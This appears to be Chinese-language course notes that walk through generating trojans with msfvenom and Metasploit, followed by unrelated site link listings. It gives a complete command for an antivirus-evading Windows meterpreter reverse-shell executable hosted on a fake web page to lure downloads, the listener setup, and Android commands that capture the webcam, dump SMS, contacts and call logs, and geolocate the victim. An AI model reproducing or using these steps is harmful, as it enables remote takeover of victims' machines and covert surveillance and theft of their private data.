木马生成

简介: 木马生成

攻击复现

1. 生成病毒

参数解释

1. -p payload

攻击所用的 payload ,这里使用 windows/meterpreter/reverse_tcp ,获取反弹

shell 。

2. lhost local host

攻击方 IP 地址。

3. lport local port

攻击方端口,这个端口与 msfconsole 中监听的要一致。

4. -e encoders

将程序进行编码,以绕过杀毒软件的检测,这里我们使用 x86/alpha_mixed 。

5. -i iterator times

迭代的次数,因为每次编码是对上一次编码的内容再次进行编码,在计算机领域这种操作叫

做“迭代(iterator)”,因此参数是 i .

迭代的过程中程序的体积会越来越大,因此要适当控制迭代次数。

6. -f file type

msfvenom -p windows/meterpreter/reverse_tcp lhost=[本地 IP] lport=[监听端口] -e [编

码方式] -i [编码次数] -f [格式] >[木马程序文件名]

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.124 lport=8848 -e

x86/alpha_mixed -i 1 -f exe >/home/yijin/fake-page/static/evil.exe

这里我们是要生成 Windows 可执行程序,因此格式为 exe 。

7. > 写入文件

我们将在 /home/yijin/fake-page/ 下跑一个网页服务,并诱导靶机从这里下载木马,因此

放在这个目录下。

2. 启动网页

网页内容已经放在了 /home/yijin/fake-page/ 目录,在这里执行 node server.js 启动服务。

3. 开启端口监听

1. msfconsole 进入 metasploit 控制台;

2. use exploit/multi/handler 使用“多面手”模块;

3. set payload windows/meterpreter/reverse_tcp 设置 payload;

4. set LHOST [IP] 设置本地IP(攻击机 IP);

5. set LPORT [PORT] 设置本地监听端口;

6. run 开始监听。

4. 靶机下载并运行木马

如无意外,在 msfconsole 输入 shell 即可拿到 shell;

whoami 查看自己身份;

可以通过关机来展示攻击成果。

5. 可演示操作

whoami 账号名称

ver 版本信息

winver windows 版本信息

hostname 主机名

ipconfig IP 地址

call xx.bat

mshta javascript:confirm("Hello world!");window.close() 弹窗问候

strat iexplore "ke.yijincc.com"

time /t 显示当前时间

安卓木马

复现步骤

老师:由于时间的关系,我们这里还是把生成的木马程序放到那个网站下,但是由于时间关系,我们就

不去改网站源码了,直接访问它的一个下载地址就行。

1. 打开模拟器,运行一个安卓系统

2. msfvenom 生成木马

3. msfconsole 开始监听

1. msfconsole 进入 metasploit 控制台;

2. set payload windows/meterpreter/reverse_tcp 设置 payload;

3. set LHOST [IP] 设置本地IP(攻击机 IP);

4. set LPORT [PORT] 设置本地监听端口;

5. run 开始监听。

4. 靶机下载、并运行木马

靶机访问攻击机页面(这里可以结合 ARP 欺骗,也可以直接访问 IP),并下载木马,运行。

!注意,这里不用输入 shell;

whoami 查看自己身份;

安卓命令

1. check_root 检查是否已经 root;

2. sysinfo 查看系统信息;

3. webcam_list 枚举摄像头;

4. webcam_snap -i [CAM INDEX] 使用指定的摄像头拍照;

5. webcam_stream 从指定的摄像头播放视频流;

6. 图片文件搜索;

7. 下载文件;

8. dump_sms 获取短信;

9. dump_contacts 下载通讯录;

10. geolocate 查看定位,但是需要安装谷歌地图;

11. dump_calllog 下载通话记录;

相关文章
|
3天前
|
人工智能 缓存 自然语言处理
阿里云百炼大模型收费价格:调用、调优和部署费用清单
阿里云百炼开通免费,调用、调优、部署按需计费。每个模型享100万Tokens免费额度,超量后计费。含推理(按Token阶梯计价)、训练(按数据量)和部署(按时长或调用量)三项费用,详情见官方文档。
168 3
|
5月前
|
存储 资源调度 Cloud Native
VMware vCenter Server 8.0U3e 新增功能简介
VMware vCenter Server 8.0U3e 新增功能简介
221 4
VMware vCenter Server 8.0U3e 新增功能简介
|
28天前
|
安全 固态存储 数据安全/隐私保护
ComPE for win 纯净的PE系统
ComPE for Win是一款轻量级Windows PE系统,专为解决系统维护与安装中的常见问题设计。它提供系统修复、便捷安装、磁盘管理及病毒清理等功能,兼容多种硬件,适用于BIOS与UEFI启动,助力用户高效应对系统故障。
|
1月前
|
弹性计算 前端开发 NoSQL
2025最新阿里云服务器配置选择攻略:CPU、内存、带宽与系统盘全解析
本文详解2025年阿里云服务器ECS配置选择策略,涵盖CPU、内存、带宽与系统盘推荐,助你根据业务需求精准选型,提升性能与性价比。
|
9月前
|
机器学习/深度学习 人工智能 分布式计算
【AI系统】混合并行
混合并行融合了数据并行、模型并行和流水线并行,旨在高效利用计算资源,尤其适合大规模深度学习模型训练。通过将模型和数据合理分配至多个设备,混合并行不仅提升了计算效率,还优化了内存使用,使得在有限的硬件条件下也能处理超大型模型。3D混合并行(DP+PP+TP)是最先进的形式,需至少8个GPU实现。此策略通过拓扑感知3D映射最大化计算效率,减少通信开销,是当前深度学习训练框架如Deepspeed和Colossal AI的核心技术之一。
418 15
【AI系统】混合并行
|
10月前
|
Windows
DOS 批处理 setlocal命令、endlocal命令详解
setlocal这是一个命令,它开始局部化环境更改,通常在批处理文件中使用,以确保在脚本中所做的任何环境更改(例如设置或修改环境变量)不会影响到调用此批处理的上下文或其他批处理文件
547 14
|
10月前
|
存储 算法 固态存储
大数据分区优化存储成本
大数据分区优化存储成本
257 4
|
10月前
|
Java
Java“NumberFormatException”解决
当尝试将字符串转换为数字时,若字符串格式不正确,则会抛出“NumberFormatException”。解决方法:1. 检查字符串是否为空或仅包含空白字符;2. 确保字符串中的字符都是数字;3. 使用异常处理捕获并处理该异常。
529 1
|
10月前
|
网络安全 数据安全/隐私保护
什么是 CSRF 攻击
CSRF(跨站请求伪造)攻击是指攻击者诱导用户点击恶意链接或提交表单,利用用户已登录的身份在目标网站上执行非授权操作,如转账、修改密码等。这种攻击通常通过嵌入恶意代码或链接实现。
|
前端开发
前端代码简洁之路,后台系统之详情页设计
前端业务开发中,为了脱离舒适区,也为了解放重复功能开发的劳动力,会将一些功能进行改造,本期改造千篇一律的详情页。
4219 26
前端代码简洁之路,后台系统之详情页设计